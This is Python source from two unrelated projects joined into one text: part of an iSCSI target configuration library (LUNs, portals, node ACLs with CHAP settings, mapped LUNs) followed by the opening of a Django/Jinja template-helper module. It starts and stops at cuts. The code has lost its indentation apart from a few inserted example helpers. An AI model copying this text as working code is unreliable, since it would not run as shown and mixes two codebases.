will be bound to the existing configFS LUN object of the parent
TPG having the specified I{lun} index. The underlying configFS
object must already exist in that mode.
@param parent_tpg: The parent TPG object.
@type parent_tpg: TPG
@param lun: The LUN index.
@type lun: 0-255
@param storage_object: The storage object to be exported as a LUN.
@type storage_object: StorageObject subclass
@param alias: An optional parameter to manually specify the LUN alias.
You probably do not need this.
@type alias: string
@return: A LUN object.
'''
super(LUN, self).__init__()
if isinstance(parent_tpg, TPG):
self._parent_tpg = parent_tpg
else:
raise RTSLibError("Invalid parent TPG")
if lun is None:
luns = [l.lun for l in self.parent_tpg.luns]
for index in range(self.MAX_LUN+1):
if index not in luns:
lun = index
break
if lun is None:
raise RTSLibError("All LUNs 0-%d in use" % self.MAX_LUN)
else:
lun = int(lun)
if lun < 0 or lun > self.MAX_LUN:
raise RTSLibError("LUN must be 0 to %d" % self.MAX_LUN)
self._lun = lun
self._path = "%s/lun/lun_%d" % (self.parent_tpg.path, self.lun)
if storage_object is None and alias is not None:
raise RTSLibError("The alias parameter has no meaning " \
+ "without the storage_object parameter")
if storage_object is not None:
self._create_in_cfs_ine('create')
try:
self._configure(storage_object, alias)
except:
self.delete()
raise
else:
self._create_in_cfs_ine('lookup')
def _configure(self, storage_object, alias):
self._check_self()
if alias is None:
alias = str(uuid.uuid4())[-10:]
else:
alias = str(alias).strip()
if '/' in alias:
raise RTSLibError("Invalid alias: %s", alias)
destination = "%s/%s" % (self.path, alias)
if storage_object.exists:
source = storage_object.path
else:
raise RTSLibError("storage_object does not exist in configFS")
os.symlink(source, destination)
def _get_alias(self):
self._check_self()
for path in os.listdir(self.path):
if os.path.islink("%s/%s" % (self.path, path)):
return os.path.basename(path)
raise RTSLibBrokenLink("Broken LUN in configFS, no storage object")
def _get_storage_object(self):
self._check_self()
alias_path = os.path.realpath("%s/%s" % (self.path, self.alias))
return tcm.StorageObject.so_from_path(alias_path)
def _get_parent_tpg(self):
return self._parent_tpg
def _get_lun(self):
return self._lun
def _list_mapped_luns(self):
self._check_self()
tpg = self.parent_tpg
if not tpg.has_feature('acls'):
return
for na in tpg.node_acls:
for mlun in na.mapped_luns:
if os.path.realpath("%s/%s" % (mlun.path, mlun.alias)) == self.path:
yield mlun
# LUN public stuff
def delete(self):
'''
If the underlying configFS object does not exist, this method does
nothing. If the underlying configFS object exists, this method attempts
to delete it along with all MappedLUN objects referencing that LUN.
'''
self._check_self()
for mlun in self.mapped_luns:
mlun.delete()
try:
link = self.alias
except RTSLibBrokenLink:
pass
else:
if os.path.islink("%s/%s" % (self.path, link)):
os.unlink("%s/%s" % (self.path, link))
super(LUN, self).delete()
parent_tpg = property(_get_parent_tpg,
doc="Get the parent TPG object.")
lun = property(_get_lun,
doc="Get the LUN index as an int.")
storage_object = property(_get_storage_object,
doc="Get the storage object attached to the LUN.")
alias = property(_get_alias,
doc="Get the LUN alias.")
mapped_luns = property(_list_mapped_luns,
doc="List all MappedLUN objects referencing this LUN.")
@classmethod
def setup(cls, tpg_obj, lun, err_func):
if 'index' not in lun:
err_func("'index' missing from a LUN in TPG %d" % tpg_obj.tag)
return
try:
bs_name, so_name = lun['storage_object'].split('/')[2:]
except (KeyError, ValueError, AttributeError):
err_func("Malformed storage object field for LUN %d" % lun['index'])
return
for so in tcm.StorageObject.all():
if so_name == so.name and bs_name == so.plugin:
match_so = so
break
else:
err_func("Could not find matching StorageObject for LUN %d" % lun['index'])
return
try:
cls(tpg_obj, lun['index'], storage_object=match_so)
except (RTSLibError, KeyError):
err_func("Creating TPG %d LUN index %d failed" %
(tpg_obj.tag, lun['index']))
def dump(self):
d = super(LUN, self).dump()
d['storage_object'] = "/backstores/%s/%s" % \
(self.storage_object.plugin, self.storage_object.name)
d['index'] = self.lun
return d
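# Illustrative sketch: exporting an existing StorageObject through the
# next free LUN index (passing lun=None scans 0..MAX_LUN for the first
# unused slot). `tpg` and `storage_object` are assumed to exist already.
def _example_export_lun(tpg, storage_object):
    return LUN(tpg, storage_object=storage_object)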
class NetworkPortal(CFSNode):
'''
This is an interface to NetworkPortals in configFS. A NetworkPortal is
identified by its IP and port, but here we also require the parent TPG, so
instance objects represent both the NetworkPortal and its association to a
TPG. This is necessary to get path information in order to create the
portal in the proper configFS hierarchy.
'''
# NetworkPortal private stuff
def __repr__(self):
return "<NetworkPortal %s port %s>" % (self.ip_address, self.port)
def __init__(self, parent_tpg, ip_address, port=3260, mode='any'):
'''
@param parent_tpg: The parent TPG object.
@type parent_tpg: TPG
@param ip_address: The ipv4/v6 IP address of the NetworkPortal. ipv6
addresses should be surrounded by '[]'.
@type ip_address: string
@param port: The optional (defaults to 3260) NetworkPortal TCP/IP port.
@type port: int
@param mode: An optional string containing the object creation mode:
- I{'any'} means the configFS object will be either looked up or
created.
- I{'lookup'} means the object MUST already exist in configFS.
- I{'create'} means the object must NOT already exist in configFS.
@type mode: string
@return: A NetworkPortal object.
'''
super(NetworkPortal, self).__init__()
self._ip_address = str(ip_address)
try:
self._port = int(port)
except ValueError:
raise RTSLibError("Invalid port")
if isinstance(parent_tpg, TPG):
self._parent_tpg = parent_tpg
else:
raise RTSLibError("Invalid parent TPG")
self._path = "%s/np/%s:%d" \
% (self.parent_tpg.path, self.ip_address, self.port)
try:
self._create_in_cfs_ine(mode)
except OSError as msg:
raise RTSLibError(msg)
def _get_ip_address(self):
return self._ip_address
def _get_port(self):
return self._port
def _get_parent_tpg(self):
return self._parent_tpg
def _get_iser(self):
try:
return bool(int(fread("%s/iser" % self.path)))
except IOError:
return False
def _set_iser(self, boolean):
path = "%s/iser" % self.path
try:
fwrite(path, str(int(boolean)))
except IOError:
# b/w compat: don't complain if iser entry is missing
if os.path.isfile(path):
raise RTSLibError("Cannot change iser")
# NetworkPortal public stuff
def delete(self):
self.iser = False
super(NetworkPortal, self).delete()
parent_tpg = property(_get_parent_tpg,
doc="Get the parent TPG object.")
port = property(_get_port,
doc="Get the NetworkPortal's TCP port as an int.")
ip_address = property(_get_ip_address,
doc="Get the NetworkPortal's IP address as a string.")
iser = property(_get_iser, _set_iser,
doc="Get or set a boolean value representing if this " \
+ "NetworkPortal supports iSER.")
@classmethod
def setup(cls, tpg_obj, p, err_func):
if 'ip_address' not in p:
err_func("'ip_address' field missing from a portal in TPG %d" % tpg_obj.tag)
return
if 'port' not in p:
err_func("'port' field missing from a portal in TPG %d" % tpg_obj.tag)
return
try:
np = cls(tpg_obj, p['ip_address'], p['port'])
np.iser = p.get('iser', False)
except (RTSLibError, KeyError) as e:
err_func("Creating NetworkPortal object %s:%s failed: %s" %
(p['ip_address'], p['port'], e))
def dump(self):
d = super(NetworkPortal, self).dump()
d['port'] = self.port
d['ip_address'] = self.ip_address
d['iser'] = self.iser
return d
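# Illustrative sketch: adding a wildcard IPv4 portal on the default iSCSI
# port. Per _set_iser above, assigning iser on a fabric without an iser
# entry is silently ignored.
def _example_add_portal(tpg):
    portal = NetworkPortal(tpg, '0.0.0.0', 3260)
    portal.iser = False
    return portal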
class NodeACL(CFSNode):
'''
This is an interface to node ACLs in configFS.
A NodeACL is identified by the initiator node wwn and parent TPG.
'''
# NodeACL private stuff
def __repr__(self):
return "<NodeACL %s>" % self.node_wwn
def __init__(self, parent_tpg, node_wwn, mode='any'):
'''
@param parent_tpg: The parent TPG object.
@type parent_tpg: TPG
@param node_wwn: The wwn of the initiator node for which the ACL is
created.
@type node_wwn: string
@param mode: An optional string containing the object creation mode:
- I{'any'} means the configFS object will be either looked up or
created.
- I{'lookup'} means the object MUST already exist in configFS.
- I{'create'} means the object must NOT already exist in configFS.
@type mode: string
@return: A NodeACL object.
'''
super(NodeACL, self).__init__()
if isinstance(parent_tpg, TPG):
self._parent_tpg = parent_tpg
else:
raise RTSLibError("Invalid parent TPG")
fm = self.parent_tpg.parent_target.fabric_module
self._node_wwn, self.wwn_type = normalize_wwn(fm.wwn_types, node_wwn)
self._path = "%s/acls/%s" % (self.parent_tpg.path, fm.to_fabric_wwn(self.node_wwn))
self._create_in_cfs_ine(mode)
def _get_node_wwn(self):
return self._node_wwn
def _get_parent_tpg(self):
return self._parent_tpg
def _get_tcq_depth(self):
self._check_self()
path = "%s/cmdsn_depth" % self.path
return fread(path)
def _set_tcq_depth(self, depth):
self._check_self()
path = "%s/cmdsn_depth" % self.path
try:
fwrite(path, "%s" % depth)
except IOError as e:
raise RTSLibError("Cannot set tcq_depth: %s" % e)
def _get_tag(self):
self._check_self()
try:
tag = fread("%s/tag" % self.path)
if tag:
return tag
return None
except IOError:
return None
def _set_tag(self, tag_str):
with ignored(IOError):
if tag_str is None:
fwrite("%s/tag" % self.path, 'NULL')
else:
fwrite("%s/tag" % self.path, tag_str)
def _list_mapped_luns(self):
self._check_self()
for mapped_lun_dir in glob("%s/lun_*" % self.path):
mapped_lun = int(os.path.basename(mapped_lun_dir).split("_")[1])
yield MappedLUN(self, mapped_lun)
def _get_session(self):
try:
lines = fread("%s/info" % self.path).splitlines()
except IOError:
return None
if lines[0].startswith("No active"):
return None
session = {}
for line in lines:
if line.startswith("InitiatorName:"):
session['parent_nodeacl'] = self
session['connections'] = []
elif line.startswith("InitiatorAlias:"):
session['alias'] = line.split(":")[1].strip()
elif line.startswith("LIO Session ID:"):
session['id'] = int(line.split(":")[1].split()[0])
session['type'] = line.split("SessionType:")[1].split()[0].strip()
elif "TARG_SESS_STATE_" in line:
session['state'] = line.split("_STATE_")[1].split()[0]
elif "TARG_CONN_STATE_" in line:
cid = int(line.split(":")[1].split()[0])
cstate = line.split("_STATE_")[1].split()[0]
session['connections'].append(dict(cid=cid, cstate=cstate))
elif "Address" in line:
session['connections'][-1]['address'] = line.split()[1]
session['connections'][-1]['transport'] = line.split()[2]
return session
# NodeACL public stuff
def has_feature(self, feature):
'''
Whether or not this NodeACL has a certain feature.
'''
return self.parent_tpg.has_feature(feature)
def delete(self):
'''
Delete the NodeACL, including all MappedLUN objects.
If the underlying configFS object does not exist, this method does
nothing.
'''
self._check_self()
for mapped_lun in self.mapped_luns:
mapped_lun.delete()
super(NodeACL, self).delete()
def mapped_lun(self, mapped_lun, tpg_lun=None, write_protect=None):
'''
Same as MappedLUN() but without the parent_nodeacl parameter.
'''
self._check_self()
return MappedLUN(self, mapped_lun=mapped_lun, tpg_lun=tpg_lun,
write_protect=write_protect)
tcq_depth = property(_get_tcq_depth, _set_tcq_depth,
doc="Set or get the TCQ depth for the initiator " \
+ "sessions matching this NodeACL.")
tag = property(_get_tag, _set_tag,
doc="Set or get the NodeACL tag. If not supported, return None")
parent_tpg = property(_get_parent_tpg,
doc="Get the parent TPG object.")
node_wwn = property(_get_node_wwn,
doc="Get the node wwn.")
mapped_luns = property(_list_mapped_luns,
doc="Get the list of all MappedLUN objects in this NodeACL.")
session = property(_get_session,
doc="Gives a snapshot of the current session or C{None}")
chap_userid = property(partial(_get_auth_attr, attribute='auth/userid'),
partial(_set_auth_attr, attribute='auth/userid'),
doc="Set or get the initiator CHAP auth userid.")
chap_password = property(partial(_get_auth_attr, attribute='auth/password'),
partial(_set_auth_attr, attribute='auth/password',),
doc="Set or get the initiator CHAP auth password.")
chap_mutual_userid = property(partial(_get_auth_attr, attribute='auth/userid_mutual'),
partial(_set_auth_attr, attribute='auth/userid_mutual'),
doc="Set or get the initiator CHAP auth userid.")
chap_mutual_password = property(partial(_get_auth_attr, attribute='auth/password_mutual'),
partial(_set_auth_attr, attribute='auth/password_mutual'),
doc="Set or get the initiator CHAP auth password.")
def _get_authenticate_target(self):
self._check_self()
path = "%s/auth/authenticate_target" % self.path
return bool(int(fread(path)))
authenticate_target = property(_get_authenticate_target,
doc="Get the boolean authenticate target flag.")
@classmethod
def setup(cls, tpg_obj, acl, err_func):
if 'node_wwn' not in acl:
err_func("'node_wwn' missing in node_acl")
return
try:
acl_obj = cls(tpg_obj, acl['node_wwn'])
except RTSLibError as e:
err_func("Error when creating NodeACL for %s: %s" % (acl['node_wwn'], e))
return
set_attributes(acl_obj, acl.get('attributes', {}), err_func)
for mlun in acl.get('mapped_luns', []):
MappedLUN.setup(tpg_obj, acl_obj, mlun, err_func)
dict_remove(acl, ('attributes', 'mapped_luns', 'node_wwn'))
for name, value in six.iteritems(acl):
if value:
try:
setattr(acl_obj, name, value)
except Exception:
err_func("Could not set nodeacl %s attribute '%s'" %
(acl['node_wwn'], name))
def dump(self):
d = super(NodeACL, self).dump()
d['node_wwn'] = self.node_wwn
d['mapped_luns'] = [lun.dump() for lun in self.mapped_luns]
if self.tag:
d['tag'] = self.tag
if self.has_feature("auth"):
for attr in auth_params:
val = getattr(self, "chap_" + attr, None)
if val:
d["chap_" + attr] = val
return d
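# Illustrative sketch: granting one initiator access to a TPG LUN. The
# initiator WWN is hypothetical; mapped_lun 0 is the index the initiator
# will see, regardless of the TPG-side LUN index.
def _example_grant_access(tpg, tpg_lun,
                          initiator='iqn.1994-05.com.example:client1'):
    acl = NodeACL(tpg, initiator)
    return acl.mapped_lun(0, tpg_lun=tpg_lun, write_protect=False)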
class MappedLUN(CFSNode):
'''
This is an interface to RTS Target Mapped LUNs.
A MappedLUN is a mapping of a TPG LUN to a specific initiator node, and is
part of a NodeACL. It allows the initiator to actually access the TPG LUN
if ACLs are enabled for the TPG. The initial TPG LUN will then be seen by
the initiator node as the MappedLUN.
'''
# MappedLUN private stuff
def __repr__(self):
return "<MappedLUN %s lun %d -> tpg%d lun %d>" % \
(self.parent_nodeacl.node_wwn, self.mapped_lun,
self.parent_nodeacl.parent_tpg.tag, self.tpg_lun.lun)
def __init__(self, parent_nodeacl, mapped_lun,
tpg_lun=None, write_protect=None):
'''
A MappedLUN object can be instantiated in two ways:
- B{Creation mode}: If I{tpg_lun} is specified, the underlying
configFS object will be created with that parameter. No MappedLUN
with the same I{mapped_lun} index can pre-exist in the parent
NodeACL in that mode, or instantiation will fail.
- B{Lookup mode}: If I{tpg_lun} is not set, then the MappedLUN will
be bound to the existing configFS MappedLUN object of the parent
NodeACL having the specified I{mapped_lun} index. The underlying
configFS object must already exist in that mode.
@param mapped_lun: The mapped LUN index.
@type mapped_lun: int
@param tpg_lun: The TPG LUN index to map, or directly a LUN object
that belongs to the same TPG as the parent NodeACL.
@type tpg_lun: int or LUN
@param write_protect: The write-protect flag value, defaults to False
(write-protection disabled).
@type write_protect: bool
'''
super(MappedLUN, self).__init__()
if not isinstance(parent_nodeacl, NodeACL):
raise RTSLibError("The parent_nodeacl parameter must be " \
+ "a NodeACL object")
else:
self._parent_nodeacl = parent_nodeacl
if not parent_nodeacl.exists:
raise RTSLibError("The parent_nodeacl does not exist")
try:
self._mapped_lun = int(mapped_lun)
except ValueError:
raise RTSLibError("The mapped_lun parameter must be an " \
+ "integer value")
self._path = "%s/lun_%d" % (self.parent_nodeacl.path, self.mapped_lun)
if tpg_lun is None and write_protect is not None:
raise RTSLibError("The write_protect parameter has no " \
+ "meaning without the tpg_lun parameter")
if tpg_lun is not None:
self._create_in_cfs_ine('create')
try:
self._configure(tpg_lun, write_protect)
except:
self.delete()
raise
else:
self._create_in_cfs_ine('lookup')
def _configure(self, tpg_lun, write_protect):
self._check_self()
if isinstance(tpg_lun, LUN):
tpg_lun = tpg_lun.lun
else:
try:
tpg_lun = int(tpg_lun)
except ValueError:
raise RTSLibError("The tpg_lun must be either an "
+ "integer or a LUN object")
# Check that the tpg_lun exists in the TPG
for lun in self.parent_nodeacl.parent_tpg.luns:
if lun.lun == tpg_lun:
tpg_lun = lun
break
if not (isinstance(tpg_lun, LUN) and tpg_lun):
raise RTSLibError("LUN %s does not exist in this TPG"
% str(tpg_lun))
os.symlink(tpg_lun.path, "%s/%s"
% (self.path, str(uuid.uuid4())[-10:]))
try:
self.write_protect = int(write_protect) > 0
except (TypeError, ValueError):
self.write_protect = False
def _get_alias(self):
self._check_self()
for path in os.listdir(self.path):
if os.path.islink("%s/%s" % (self.path, path)):
return os.path.basename(path)
raise RTSLibBrokenLink("Broken LUN in configFS, no storage object")
def _get_mapped_lun(self):
return self._mapped_lun
def _get_parent_nodeacl(self):
return self._parent_nodeacl
def _set_write_protect(self, write_protect):
self._check_self()
path = "%s/write_protect" % self.path
if write_protect:
fwrite(path, "1")
else:
fwrite(path, "0")
def _get_write_protect(self):
self._check_self()
path = "%s/write_protect" % self.path
return bool(int(fread(path)))
def _get_tpg_lun(self):
self._check_self()
path = os.path.realpath("%s/%s" % (self.path, self.alias))
for lun in self.parent_nodeacl.parent_tpg.luns:
if lun.path == path:
return lun
raise RTSLibBrokenLink("Broken MappedLUN, no TPG LUN found")
def _get_node_wwn(self):
self._check_self()
return self.parent_nodeacl.node_wwn
# MappedLUN public stuff
def delete(self):
'''
Delete the MappedLUN.
'''
self._check_self()
try:
lun_link = "%s/%s" % (self.path, self.alias)
except RTSLibBrokenLink:
pass
else:
if os.path.islink(lun_link):
os.unlink(lun_link)
super(MappedLUN, self).delete()
mapped_lun = property(_get_mapped_lun,
doc="Get the integer MappedLUN mapped_lun index.")
parent_nodeacl = property(_get_parent_nodeacl,
doc="Get the parent NodeACL object.")
write_protect = property(_get_write_protect, _set_write_protect,
doc="Get or set the boolean write protection.")
tpg_lun = property(_get_tpg_lun,
doc="Get the TPG LUN object the MappedLUN is pointing at.")
node_wwn = property(_get_node_wwn,
doc="Get the wwn of the node for which the TPG LUN is mapped.")
alias = property(_get_alias,
doc="Get the MappedLUN alias.")
@classmethod
def setup(cls, tpg_obj, acl_obj, mlun, err_func):
if 'tpg_lun' not in mlun:
err_func("'tpg_lun' not in a mapped_lun")
return
if 'index' not in mlun:
err_func("'index' not in a mapped_lun")
return
# Mapped lun needs to correspond with already-created
# TPG lun
for lun in tpg_obj.luns:
if lun.lun == mlun['tpg_lun']:
tpg_lun_obj = lun
break
else:
err_func("Could not find matching TPG LUN %d for MappedLUN %s" %
(mlun['tpg_lun'], mlun['index']))
return
try:
mlun_obj = cls(acl_obj, mlun['index'],
tpg_lun_obj, mlun.get('write_protect'))
mlun_obj.tag = mlun.get("tag", None)
except (RTSLibError, KeyError):
err_func("Creating MappedLUN object %d failed" % mlun['index'])
def dump(self):
d = super(MappedLUN, self).dump()
d['write_protect'] = self.write_protect
d['index'] = self.mapped_lun
d['tpg_lun'] = self.tpg_lun.lun
return d
class Group(object):
'''
An abstract base class akin to CFSNode, but for classes that
emulate a higher-level group object across the actual NodeACL
configfs structure.
'''
def __init__(self, members_func):
'''
members_func is a function that takes a self argument
and returns an iterator of the objects that the
derived Group class is grouping.
'''
self._mem_func = members_func
def _get_first_member(self):
try:
return next(self._mem_func(self))
except StopIteration:
raise IndexError("Group is empty")
def _get_prop(self, prop):
'''
Helper fn to use with partial() to support getting a
property value from the first member of the group.
(All members of the group should be identical.)
'''
return getattr(self._get_first_member(), prop)
def _set_prop(self, value, prop):
'''
Helper fn to use with partial() to support setting a
property value in all members of the group.
Caution: Arguments reversed!
This is so partial() can be used on property name.
'''
for mem in self._mem_func(self):
setattr(mem, prop, value)
def list_attributes(self, writable=None):
return self._get_first_member().list_attributes(writable)
def list_parameters(self, writable=None):
return self._get_first_member().list_parameters(writable)
def set_attribute(self, attribute, value):
for obj in self._mem_func(self):
obj.set_attribute(attribute, value)
def set_parameter(self, parameter, value):
for obj in self._mem_func(self):
obj.set_parameter(parameter, value)
def get_attribute(self, attribute):
return self._get_first_member().get_attribute(attribute)
def get_parameter(self, parameter):
return self._get_first_member().get_parameter(parameter)
def delete(self):
'''
Delete all members of the group.
'''
for mem in self._mem_func(self):
mem.delete()
@property
def exists(self):
return any(self._mem_func(self))
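# Illustrative note: concrete groups expose shared settings by pairing the
# helpers above with functools.partial, mirroring the real definitions
# further down, e.g.:
#
#     write_protect = property(
#         partial(Group._get_prop, prop="write_protect"),
#         partial(Group._set_prop, prop="write_protect"))
#
# Reads consult the first member only (members are assumed identical);
# writes fan out to every member.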
def _check_group_name(name):
# Since all WWNs have a '.' in them, let's avoid confusion.
if '.' in name:
raise RTSLibError("'.' not permitted in group names.")
class NodeACLGroup(Group):
'''
Allow a group of NodeACLs that share a tag to be managed collectively.
'''
def __repr__(self):
return "<NodeACLGroup %s>" % self.name
def __init__(self, parent_tpg, name):
super(NodeACLGroup, self).__init__(NodeACLGroup._node_acls.fget)
_check_group_name(name)
self._name = name
self._parent_tpg = parent_tpg
def _get_name(self):
return self._name
def _set_name(self, name):
_check_group_name(name)
for na in self._node_acls:
na.tag = name
self._name = name
@property
def parent_tpg(self):
'''
Get the parent TPG object.
'''
return self._parent_tpg
def add_acl(self, node_wwn):
'''
Add a WWN to the NodeACLGroup. If a NodeACL already exists for this WWN,
its configuration will be changed to match the NodeACLGroup, except for its
auth parameters, which can vary among group members.
@param node_wwn: An initiator WWN
@type node_wwn: string
'''
nacl = NodeACL(self.parent_tpg, node_wwn)
if nacl in self._node_acls:
return
# if joining a group, take its config
try:
model = next(self._node_acls)
except StopIteration:
pass
else:
for mlun in nacl.mapped_luns:
mlun.delete()
for mlun in model.mapped_luns:
MappedLUN(nacl, mlun.mapped_lun, mlun.tpg_lun, mlun.write_protect)
for item in model.list_attributes(writable=True):
nacl.set_attribute(item, model.get_attribute(item))
for item in model.list_parameters(writable=True):
nacl.set_parameter(item, model.get_parameter(item))
finally:
nacl.tag = self.name
def remove_acl(self, node_wwn):
'''
Remove a WWN from the NodeACLGroup.
@param node_wwn: An initiator WWN
@type node_wwn: string
'''
nacl = NodeACL(self.parent_tpg, node_wwn, mode='lookup')
nacl.delete()
@property
def _node_acls(self):
'''
Gives access to the underlying NodeACLs within this group.
'''
for na in self.parent_tpg.node_acls:
if na.tag == self.name:
yield na
@property
def wwns(self):
'''
Give the Node WWNs of members of this group.
'''
return (na.node_wwn for na in self._node_acls)
def has_feature(self, feature):
'''
Whether or not this NodeACLGroup has a certain feature.
'''
return self._parent_tpg.has_feature(feature)
@property
def sessions(self):
'''
Yields any current sessions.
'''
for na in self._node_acls:
session = na.session
if session:
yield session
def mapped_lun_group(self, mapped_lun, tpg_lun=None, write_protect=None):
'''
Add a mapped lun to all group members.
'''
return MappedLUNGroup(self, mapped_lun=mapped_lun, tpg_lun=tpg_lun,
write_protect=write_protect)
@property
def mapped_lun_groups(self):
'''
Generates all MappedLUNGroup objects in this NodeACLGroup.
'''
try:
first = self._get_first_member()
except IndexError:
return
for mlun in first.mapped_luns:
yield MappedLUNGroup(self, mlun.mapped_lun)
name = property(_get_name, _set_name,
doc="Get/set NodeACLGroup name.")
def _get_chap(self, name):
for na in self._node_acls:
yield (na.node_wwn, getattr(na, "chap_" + name))
def _set_chap(self, name, value, wwn):
for na in self._node_acls:
if not wwn:
setattr(na, "chap_" + name, value)
elif wwn == na.node_wwn:
setattr(na, "chap_" + name, value)
break
def get_userids(self):
'''
Returns a (wwn, userid) tuple for each member of the group.
'''
return self._get_chap(name="userid")
def set_userids(self, value, wwn=None):
'''
If wwn, set the userid for just that wwn, otherwise set it for
all group members.
'''
return self._set_chap("userid", value, wwn)
def get_passwords(self):
'''
Returns a (wwn, password) tuple for each member of the group.
'''
return self._get_chap(name="password")
def set_passwords(self, value, wwn=None):
'''
If wwn, set the password for just that wwn, otherwise set it for
all group members.
'''
return self._set_chap("password", value, wwn)
def get_mutual_userids(self):
'''
Returns a (wwn, mutual_userid) tuple for each member of the group.
'''
return self._get_chap(name="mutual_userid")
def set_mutual_userids(self, value, wwn=None):
'''
If wwn, set the mutual_userid for just that wwn, otherwise set it for
all group members.
'''
return self._set_chap("mutual_userid", value, wwn)
def get_mutual_passwords(self):
'''
Returns a (wwn, mutual_password) tuple for each member of the group.
'''
return self._get_chap(name="mutual_password")
def set_mutual_passwords(self, value, wwn=None):
'''
If wwn, set the mutual_password for just that wwn, otherwise set it for
all group members.
'''
return self._set_chap("mutual_password", value, wwn)
tcq_depth = property(partial(Group._get_prop, prop="tcq_depth"),
partial(Group._set_prop, prop="tcq_depth"),
doc="Set or get the TCQ depth for the initiator "
+ "sessions matching this NodeACLGroup")
authenticate_target = property(partial(Group._get_prop, prop="authenticate_target"),
doc="Get the boolean authenticate target flag.")
class MappedLUNGroup(Group):
'''
Used with NodeACLGroup, this aggregates all MappedLUNs with the same LUN
so that it can be configured across all members of the NodeACLGroup.
'''
def __repr__(self):
return "<MappedLUNGroup %s:lun %d>" % (self._nag.name, self._mapped_lun)
def __init__(self, nodeaclgroup, mapped_lun, *args, **kwargs):
super(MappedLUNGroup, self).__init__(MappedLUNGroup._mapped_luns.fget)
self._nag = nodeaclgroup
self._mapped_lun = mapped_lun
for na in self._nag._node_acls:
MappedLUN(na, mapped_lun=mapped_lun, *args, **kwargs)
@property
def _mapped_luns(self):
for na in self._nag._node_acls:
for mlun in na.mapped_luns:
if mlun.mapped_lun == self.mapped_lun:
yield mlun
@property
def mapped_lun(self):
'''
Get the integer MappedLUN mapped_lun index.
'''
return self._mapped_lun
@property
def parent_nodeaclgroup(self):
'''
Get the parent NodeACLGroup object.
'''
return self._nag
write_protect = property(partial(Group._get_prop, prop="write_protect"),
partial(Group._set_prop, prop="write_protect"),
doc="Get or set the boolean write protection.")
tpg_lun = property(partial(Group._get_prop, prop="tpg_lun"),
doc="Get the TPG LUN object the MappedLUN is pointing at.")
def _test():
from doctest import testmod
testmod()
if __name__ == "__main__":
_test()
|
|
import collections
import decimal
import json as jsonlib
import os
import random
import re
from operator import attrgetter
from urlparse import urljoin
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.forms import CheckboxInput
from django.utils.translation import (
ugettext, trim_whitespace, to_locale, get_language)
from django.utils.encoding import force_text
from django.utils.html import format_html
from django.template import defaultfilters
from django.utils.functional import lazy
from django.utils.safestring import mark_safe
import caching.base as caching
import jinja2
import waffle
from babel.support import Format
from jingo import register, get_env
# Needed to make sure our own |f filter overrides jingo's.
from jingo import helpers # noqa
from jingo_minify.helpers import (
_build_html, _get_compiled_css_url, get_path, is_external)
from olympia import amo
from olympia.amo import utils, urlresolvers
from olympia.constants.licenses import PERSONA_LICENSES_IDS
# Yanking filters from Django.
register.filter(defaultfilters.slugify)
# Registering some utils as filters:
urlparams = register.filter(utils.urlparams)
register.filter(utils.epoch)
register.filter(utils.isotime)
register.function(dict)
register.function(utils.randslice)
# Mark a lazy-marked instance as safe but keep it lazy.
mark_safe_lazy = lazy(mark_safe, unicode)
@register.function
def switch_is_active(switch_name):
return waffle.switch_is_active(switch_name)
@register.filter
def link(item):
html = """<a href="%s">%s</a>""" % (item.get_url_path(),
jinja2.escape(item.name))
return jinja2.Markup(html)
@register.filter
def xssafe(value):
"""
Like |safe but for strings with interpolation.
By using |xssafe you assert that you have written tests proving an
XSS can't happen here.
"""
return jinja2.Markup(value)
@register.filter
def babel_datetime(dt, format='medium'):
return _get_format().datetime(dt, format=format) if dt else ''
@register.filter
def babel_date(date, format='medium'):
return _get_format().date(date, format=format) if date else ''
@register.function
def locale_url(url):
"""Take a URL and give it the locale prefix."""
prefixer = urlresolvers.get_url_prefix()
script = prefixer.request.META['SCRIPT_NAME']
parts = [script, prefixer.locale, url.lstrip('/')]
return '/'.join(parts)
@register.function
def url(viewname, *args, **kwargs):
"""Helper for Django's ``reverse`` in templates."""
add_prefix = kwargs.pop('add_prefix', True)
host = kwargs.pop('host', '')
src = kwargs.pop('src', '')
url = '%s%s' % (host, urlresolvers.reverse(viewname,
args=args,
kwargs=kwargs,
add_prefix=add_prefix))
if src:
url = urlparams(url, src=src)
return url
@register.function
def services_url(viewname, *args, **kwargs):
"""Helper for ``url`` with host=SERVICES_URL."""
kwargs.update({'host': settings.SERVICES_URL})
return url(viewname, *args, **kwargs)
@register.filter
def paginator(pager):
return Paginator(pager).render()
@register.filter
def impala_paginator(pager):
t = get_env().get_template('amo/impala/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@register.function
def sidebar(app):
"""Populates the sidebar with (categories, types)."""
from olympia.addons.models import Category
if app is None:
return [], []
# Fetch categories...
qs = Category.objects.filter(application=app.id, weight__gte=0,
type=amo.ADDON_EXTENSION)
# Now sort them in python according to their name property (which looks up
# the translated name using gettext + our constants)
categories = sorted(qs, key=attrgetter('weight', 'name'))
Type = collections.namedtuple('Type', 'id name url')
base = urlresolvers.reverse('home')
types = [Type(99, ugettext('Collections'), base + 'collections/')]
shown_types = {
amo.ADDON_PERSONA: urlresolvers.reverse('browse.personas'),
amo.ADDON_DICT: urlresolvers.reverse('browse.language-tools'),
amo.ADDON_SEARCH: urlresolvers.reverse('browse.search-tools'),
amo.ADDON_THEME: urlresolvers.reverse('browse.themes'),
}
titles = dict(
amo.ADDON_TYPES,
**{amo.ADDON_DICT: ugettext('Dictionaries & Language Packs')})
for type_, url in shown_types.items():
if type_ in app.types:
types.append(Type(type_, titles[type_], url))
return categories, sorted(types, key=lambda x: x.name)
class Paginator(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) // 2  # floor division; same result under Python 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = get_env().get_template('amo/paginator.html').render(c)
return jinja2.Markup(t)
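# Worked example of the window computed by Paginator.range() with the
# defaults (max=10, hence span=4): for page 7 of 20, lower/upper come out
# as 3/10, so the visible window is [4, 5, 6, 7, 8, 9, 10] and both
# dotted_lower and dotted_upper are True (pages 1 and 20 fall outside it).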
def _get_format():
lang = get_language()
